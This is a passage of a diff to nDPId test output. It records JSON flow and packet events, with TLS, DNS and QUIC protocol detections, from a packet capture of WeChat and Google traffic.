+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342893,"flow_last_seen":1492167342893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1492167342893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342893,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8j4ZAAEAGJj\/AqAFnrNkWDpcBAbvnsj+XAAAAAKACchDgsAAAAgQFtAQCCAoAMLARAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1492167342941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342941,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8xIIAADIGPqOs2RYOwKgBZwG7lwHnJuhS57I\/mKASpajHRwAAAgQFZAQCCApd2bi8ADCwEQEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1492167342941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167342941,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0j4dAAEAGJkbAqAFnrNkWDpcBAbvnsj+Y5yboU4AQAOWaewAAAQEICgAwsB1d2bi8"} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} +02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0u5hAAEAGF5PAqAFn2DrNTroLAbv4cm+uICz91YAQATUbzAAAAQEICgAwswD2qQZf"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ew1AAEAGOYDAqAFnrNkXTs\/kAbv7Pa3ZiiWYPIAQAT3Z6QAAAQEICgAwswB+x0ZO"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1492167345935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345935,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0XCMAADcGv2jYOs1OwKgBZwG7ugsgLP3V+HJvr4AQAV1HoAAAAQEICvaptmIAL9cA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1492167345937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345937,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vmsAADcGPoKs2RdOwKgBZwG7z+SKJZg8+z2t2oAQAVQFzwAAAQEICn7H9k8AL9cC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492167347435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167347435,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0LFtAACwG\/EnLzZeiwKgBZwG700RsJQ5CFiW5B4ARAQCiIgAAAQEICkXRnm4AMKsW"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1492167350333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167350333,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92D9AAEAR3brAqAFnwKgB\/rP+ADUAKS5MZgIBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -52,101 +52,101 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 01693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1492167351067,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":969,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":969,"pkt_l4_len":935,"thread_ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAO7bQZAAEARabPAqAFn2DrGLuD3AbsDp2YqDU3ZCrKMtFhpUTAzNQJxZNfHCC8u2f35luXQX7wk8+5+gy499Uo4Fg20rRdDDy5CsdXoRXrF+phU81nis1nRDRx09GXiKDxOppPR5wHoCPv6GGJ1a2aSeKMbWb+zwKTlNc+IgrbKFFqH047ViEQZsFLjifeqmjWw3kLjF9wuTO5xmTDc8NygVX92ZUjcWiRsZklVVPx3NbEThZxDUrne5HeS9hEKQhiWqsRNFsJ5ZewxcV+5cYvvBeYiQR+kS3f\/LZqZAjI6Q5gDCFVg4IVHBTbsdm3CNW6MkXX6Z21DpqBMIia1Z2wV8I9lmIjOLOKjoJcu+pem0sj3G6u1FBaJ6UzuToaeQVFoQV1B7THlLpcbWhfyxWuv5Vq5Nhbvz\/hy9e3GvHaPkX2Ap3unG8P22QcYcGd\/BWZtvoWlpacJDV2epOkkS7tt5wlFKOWfO8\/5Yu\/gJ5xuBFw7XGdmQknr+9LaS3e8wZiMR1ZfimH2Wrss8HcQEl9TcUi0OPt7hg4vPxA1umUMgAjxmP3GICQIJ8v3MSyfSe36zfbmMnzMFR+cZ4RVKOKFuZsig3U7Qla3oB3K2bziFfb7gRL+hERHc4YgKgGNFngj+oqw2jdkj\/RqXvOIZPBl74wKoDpJdAAu0pwpTpg0OYCvwu\/ep3j0WkfwnzYcwnEEOfrkyBT8sslKLByrPD6217xh62Bp0UxecAcjRSXYnXrLG4gF\/OklBRUl9MWf17862YoGJ6mbQ8Q1BCG\/ur1PzAt2\/FqJ05MHkwrkRVSHl4pDeBaR66Du4ZmV0GBx989HTukTQy\/3OGUKXjAXhJdjcsLd1jo\/K0yDhk26WE7HHoqWgHvMgQjGE2RFzuX36OVzPCIEOwd9oe0YVvAfM\/rVc9genM5Hy7Sv8mutamuMH7bROMktPGAdZ\/IFx5w4VWad64HIS2eSUBLGRLvosHNSRrNdfupAMBGIyjJeytCFI+Ljtgl1sqegx6JwAaGxpjS+ZJjXdtHKXMd1GSxa\/aZjv\/gLSgGEeQHgpM0w997OPOSc\/oXhrMG2H9dPnVY0gxfZjD+EVSDAUqgCePMf4Xk+wruAsQ37\/lHXudBmH90ljRj8ye51wbrJXjVUKo39iLcU6hZ05\/StCBdO\/xPb895mMSP5JnWfCWFSaYGQN4FQQYatRm1PasNLHcHWO0PLezKCDM2gsmrDE3X\/KwGBhJhce2KxIu1Tjfe9ZeVoyy0Oxy0Bb7O\/93ta"} 02270{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1492167351121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167351121,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcR3XLYOsYuwKgBZwG74PcFTmzaBOou0Nigzud3ZaOudETm8GBczN7q3HxIUIOzVIoPsD73AQkDw5o48VPCPgxwE9bagOsfguW4BXFTqIT1IIV5ThjijbPacPMIeuYY+tLcR\/SESotUnfD6k31MBpngxATfGEoS3TSTc9aVt2BKPUkJNXTxIqajXh4z+2CjCT16kZiox8Qmel6o7NAeDdJDfOL+51L\/G92mnF40IupMo8kyn6Yeya9Ad1Q2D\/p2FAN4KbvETwnyCCrN\/3BzK6jhLgRMRUMpD76aZzYbZwTnnjn5cPWJgIaiNlEoyxA7CP6REtuotFUshn\/4\/Je7Jbm8GzbVpuThmCVdHsCKO9eQafmXETXyGPOX37U\/+RYvpidmrbPADR3IJ0YyPcE55eQPeQ3SLMLpJR+N0H26d91w3L3p89mtepH0NeIecXxbZcygXiO3ouImKiBH5Sols1nP6qAehqtyidEipR4ZPAV4Xw0h5rAYVjkhxL41hJnSJmoocaWAxV46W2QvJzsrabDi5M9SzvhRJAsPZZY4K6G5dvQpS2uzTzQOzxWkGBlQl7RRRgKZIcNK4yIcQD0yIGCwwoktA2Ld1Idk2Cu5os+Y7KXAeUWL4EghycwrRGckuLuUQjKt2wiWE8fO7O4\/Lv2VZCpq74PXu3G5CCkcU65VQJeeZrPt8UoeqowDQ+esOAIZ137WnNojv8+UsGDeg+xMKBRUrYaoT8ER8YifN6riDqUjipfNYkbEn8ucoDGqAIlyleAS5\/XHM13il1iRyxEOLilein7LTbUQNfwFOf8EzXgCnR+IpNR4wHUKNWXhmNPOYokIP23Sl\/FaC5yeTIvYRTQb\/x8mhYj\/WIs05PouLe9Pt+TRR3N2YyYcD4kqZDJk1bVFKuF7bqCGCM51z3lvURyUWHByifpl1Q0srxqBnb92qDujj+Ug5Hs9Ty\/kFB8qHvx1Dfq78jAeHz0fzz7AMlq+79RPkRIGLCbIkRGUTiiYKOqV8DW1cQsg\/KZWg+kdRSdfwb30mOCaUqILvOyhuHsdt\/VlQOncdoNcoPzCka952teJvpu3kHP0JF00GT6\/QgvMxqqvMT68gpqKr7VNH2JM4rMWfmQe7d70oO4rLXnu5+c5UkqU4+\/yoY+zdy1UMw3UYnE\/RB4x5v7QiQt4jRnCl6tLIdDw9lQg9IzEnVZzw2lt7lY+\/FC4dmux3GBahkU7C9wFjO9v95glXVXJsAYEhvS3wJvsdmH9ydK\/F3zD4bHe6QH8wln\/KtF+\/2hcmCsTO+QWhFCYnQytBu\/Dd7UqbnYMeu6CvYKHngUiBNqyzWOGJEUUIwiWru1HLQ+oi18IFAgJS2Pl99aG5LYQ83XtdOxJ4pO0nKlJ0xc1wx6vqc9D94XgPsJhPmRnKuyWzZTwOjFjJ4fG3PqBIeO52giJ97T6kI1ufnseC2DoOQ7mgmmkhk1xFPh\/iCEO2sH8\/yvC3ciJ3q1jHvS6trEx0psWwZhrcKMoj6uJQAqWOx\/4VMZblPtRO0JRK2sKrnR0AuXFvTgyJJXrSQnKCt4f0Ie08Z0FhokeNmZugGY11eoMg2b0Ohw1Gcl+Nco\/Mm0dOR0d0ZzowYYFQVn8Z1G5U0v2I0P+bjqBg\/Oft0VL\/uESmpcBS8+q9YYq03mdZfyrm0Wll6v2MrVZ+luVDiDPf+2zCNGMeJyqwXqCBY\/GUBtV\/ORVHwTg4O9+bDUiGoGMfoIrfv0WX52viV1sxsvodgKw\/K7R89paaPWnO6gRTKekrbX0nVKtcWseMnbmEds6efJmpuqUD3hZqUyUuRhdxz6a7pUXagTh"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167352068,"flow_last_seen":1492167352068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167352068,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1492167352068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352068,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePFAAEAGFx7AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO38PQAAAQEICgAwuQeFnMDK"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1492167352122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352122,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0OfYAACsGqnlA6ae8wKgBZxRsjLFKrVv6utDMqYAQAWVTqwAAAQEICoWdcMgAL7Ej"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1492167353674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1492167353674,"pkt":"eJKcD6iO8IQvSpdgCABFoAD6dwRAACwGsNrLzZeiwKgBZwG70ypPgUs4IVggsIAYAQuBHwAAAQEICkXRpIYAMKn\/FwMDAMGOrZUQQd+ekzcfermPixMN7baWMlCLOjLGRLUay7A9ywN4ZUGmiUXDO1gdTDC98QU1t8eAbnyMFUBj5qM3d0y5XCUUPMCeBhhxcxN\/8G4Ch12FyipeyhGtwqgzXcsPc5ZQsJ\/Yfu\/XdVaAYYDYsfkQdrrVo9IGd6i0jIOj1GEXv+MuFcw5UP8MbQ5QLfOihRir7leYEOxmHGeDrisZkZBhOzKLL2Q5myihhKQJ9yeXWCsp\/s4j9ebB8kfX1kVSE8Aa"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1492167353675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353675,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0n8JAAEAGdYLAqAFny82XotMqAbshWCCwT4FL\/oAQAcj35wAAAQEICgAwuphF0aSG"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoXgBAAEAGtx\/AqAFny82X058lAbtnDvSGeC5ApFARAOXT9QAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwNAAEAG0kHAqAFny82XotNFAbtA8usy6z8oEoARAOWo0QAAAQEICgAwuptF0ZJx"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZmlAAEAGrtPAqAFny82XotNJAbvI4NzyAAAAAKACchB6zAAAAgQFtAQCCAoAMLqbAAAAAAEDAwc="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353937,"flow_last_seen":1492167353937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353937,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1492167353937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353937,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8a3xAAEAGqcDAqAFny82XotNKAbuhD9GmAAAAAKACchCtqQAAAgQFtAQCCAoAMLraAAAAAAEDAwc="} 